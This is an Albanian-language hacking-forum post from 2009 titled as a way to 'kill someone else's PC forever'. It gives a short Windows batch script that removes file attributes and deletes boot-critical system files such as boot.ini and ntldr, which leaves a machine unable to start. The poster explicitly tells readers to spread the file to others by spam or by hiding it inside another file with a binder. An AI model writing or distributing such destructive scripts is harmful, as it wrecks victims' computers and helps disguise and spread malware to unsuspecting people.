Fike nje PC te huaj ... pergjithmon! Funksionon 100%

  Share
  avatar
  A.[s].W.-TeaM | tR1pLeeX;
  Administrator
  Administrator

  Postimet : 617
  Pikët : 1454
  Thanks : 1
  Join date : 14/05/2009

  (N) Fike nje PC te huaj ... pergjithmon! Funksionon 100%

  Mesazh nga A.[s].W.-TeaM | tR1pLeeX; prej Fri May 15, 2009 6:45 am

  Fillimisht ,unë nuk mbajë përgjegjsi per dëmet që mundë ti shkaktoni ju.

  Hapim Notepadin dhe vendosim këtë kodë:

  @echo off
  attrib -r -s -h c:\autoexec.bat
  del c:\autoexec.bat
  attrib -r -s -h c:\boot.ini
  del c:\boot.ini
  attrib -r -s -h c:\ntldr
  del c:\ntldr
  attrib -r -s -h c:\windows\win.ini
  del c:\windows\win.ini


  E ruajmë këtë fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat

  Për ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.

  Kujdes! Mos e hapni këtë fajll ne PC tuaj.

  Tash ju mbetet ta shperndani si të dëshironi ju ,me spam apo edhe tia bashkangjitni një fajlli tjetër me ndonjë file binder.


  __________________
  Kujdes :Nuk Pranoj Kerkesa, Ndihma Ne msn

   Ora është Mon Jun 18, 2018 6:52 pm